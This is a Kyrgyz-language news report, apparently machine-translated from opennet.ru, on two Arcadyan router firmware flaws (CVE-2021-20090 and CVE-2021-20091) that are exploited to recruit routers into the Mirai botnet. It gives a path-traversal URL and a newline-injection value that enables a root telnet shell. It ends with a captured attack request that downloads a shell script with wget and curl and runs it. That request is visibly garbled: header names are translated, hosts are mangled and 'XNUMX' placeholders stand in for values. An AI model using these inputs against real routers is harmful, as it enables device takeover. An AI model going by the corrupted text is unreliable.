Микропрограммасы Arcadyan компаниясынын HTTP серверин ишке ашырууну колдонгон үй роутерлерине каршы тармакта массалык чабуул катталды. Түзмөктөрдү башкарууга ээ болуу үчүн, тамыр укуктары менен каалаган кодду алыстан аткарууга мүмкүндүк берген эки алсыздыктын айкалышы колдонулат. Көйгөй Arcadyan, ASUS жана Buffalo компанияларынын ADSL роутерлеринин кеңири спектрин, ошондой эле Beeline бренддери менен (маселе Smart Box Flashде тастыкталган), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone жана башка байланыш операторлору. Белгиленгендей, көйгөй Arcadyan микропрограммасында 10 жылдан ашык убакыттан бери бар жана бул убакыттын ичинде 20 түрдүү өндүрүүчүлөрдүн кеминде 17 түзмөк моделине көчүрүүгө жетишкен.
Биринчи аялуу, CVE-2021-20090, каалаган веб-интерфейс скриптине аутентификациясыз кирүүгө мүмкүндүк берет. Алсыздыктын маңызы веб-интерфейсте сүрөттөр, CSS файлдары жана JavaScript скрипттери жөнөтүлө турган кээ бир каталогдор аутентификациясыз жеткиликтүү болуп саналат. Бул учурда, аутентификациясыз кирүүгө уруксат берилген каталогдор баштапкы масканы колдонуу менен текшерилет. Аталык каталогго өтүү жолдорунда “../” белгилерди көрсөтүү микропрограмма тарабынан бөгөттөлгөн, бирок “..%2f” айкалышын колдонуу өткөрүлбөйт. Ошентип, "http://192.168.1.1/images/..%2findex.htm" сыяктуу суроо-талаптарды жөнөтүүдө корголгон баракчаларды ачууга болот.
Экинчи аялуу, CVE-2021-20091, аутентификацияланган колдонуучуга приложение_abstract.cgi скриптине атайын форматталган параметрлерди жөнөтүү аркылуу түзмөктүн системалык жөндөөлөрүнө өзгөртүүлөрдү киргизүүгө мүмкүндүк берет, ал параметрлерде жаңы сап белгисинин бар-жоктугун текшербейт. . Мисалы, пинг операциясын аткарып жатканда, чабуулчу текшерилип жаткан IP дареги менен талаада “192.168.1.2%0AARC_SYS_TelnetdEnable=1” маанисин жана /tmp/etc/config/ орнотуулар файлын түзүүдө скриптти көрсөтө алат. .glbcfg, ага “AARC_SYS_TelnetdEnable=1” сабын жазат, ал telnetd серверин активдештирет, ал тамыр укуктары менен чектелбеген буйрук кабыкчасын камсыз кылат. Ошо сыяктуу эле, AARC_SYS параметрин коюу менен, сиз системадагы каалаган кодду аткара аласыз. Биринчи аялуу көйгөйлүү скриптти “/images/..%2fapply_abstract.cgi” катары кирүү аркылуу аутентификациясыз иштетүүгө мүмкүндүк берет.
Кемчиликтерди пайдалануу үчүн чабуулчу веб-интерфейс иштеп жаткан тармак портуна суроо-талап жөнөтө алышы керек. Чабуулдун жайылуу динамикасына караганда, көптөгөн операторлор колдоо кызматы тарабынан көйгөйлөрдүн диагностикасын жөнөкөйлөтүү үчүн тышкы тармактан өз түзмөктөрүнө кирүү мүмкүнчүлүгүн калтырышат. Эгерде интерфейске кирүү ички тармак менен гана чектелсе, чабуул "DNS rebinding" ыкмасын колдонуу менен тышкы тармактан жүргүзүлүшү мүмкүн. Маршрутизаторлорду Mirai ботнетине туташтыруу үчүн аялуу жерлер жигердүү колдонулууда: POST /images/..%2fapply_abstract.cgi HTTP/1.1 Туташуу: Колдонуучу-агентти жабу: Dark action=start_ping&submit_button=ping.html& action_params=blink_time%3D5&ARC_ping=212.192.241.7.i0. 1%0A ARC_SYS_TelnetdEnable=212.192.241.72& %212.192.241.72AARC_SYS_=cd+/tmp; wget+http://777/lolol.sh; curl+-O+http://0/lolol.sh; chmod+4+lolol.sh; sh+lolol.sh&ARC_ping_status=XNUMX&TMP_Ping_Type=XNUMX
Source: opennet.ru